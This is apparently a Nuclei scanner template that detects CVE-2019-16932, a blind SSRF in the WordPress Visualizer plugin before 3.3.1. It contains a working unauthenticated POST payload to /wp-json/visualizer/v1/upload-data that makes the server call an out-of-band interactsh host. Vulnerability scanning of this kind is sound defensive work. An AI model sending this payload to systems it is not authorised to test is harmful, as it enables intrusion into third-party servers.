id: CVE-2019-16932 info: name: Visualizer <3.3.1 - Blind Server-Side Request Forgery author: akincibor severity: critical description: | Visualizer prior to 3.3.1 suffers from a blind server-side request forgery vulnerability via the /wp-json/visualizer/v1/upload-data endpoint. reference: - https://wpscan.com/vulnerability/9892 - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - https://nvd.nist.gov/vuln/detail/CVE-2019-16932 - https://wordpress.org/plugins/visualizer/#developers classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N cvss-score: 10 cve-id: CVE-2019-16932 cwe-id: CWE-918 tags: cve,cve2019,wp-plugin,ssrf,wordpress,xss,unauth,wpscan requests: - method: POST path: - '{{BaseURL}}/wp-json/visualizer/v1/upload-data' body: '{\"url\":\"http://{{interactsh-url}}\"}' headers: Content-Type: application/x-www-form-urlencoded matchers-condition: and matchers: - type: word part: interactsh_protocol name: http words: - "http" - type: word part: header words: - "application/json" - type: status status: - 200 # Enhanced by mp on 2022/05/27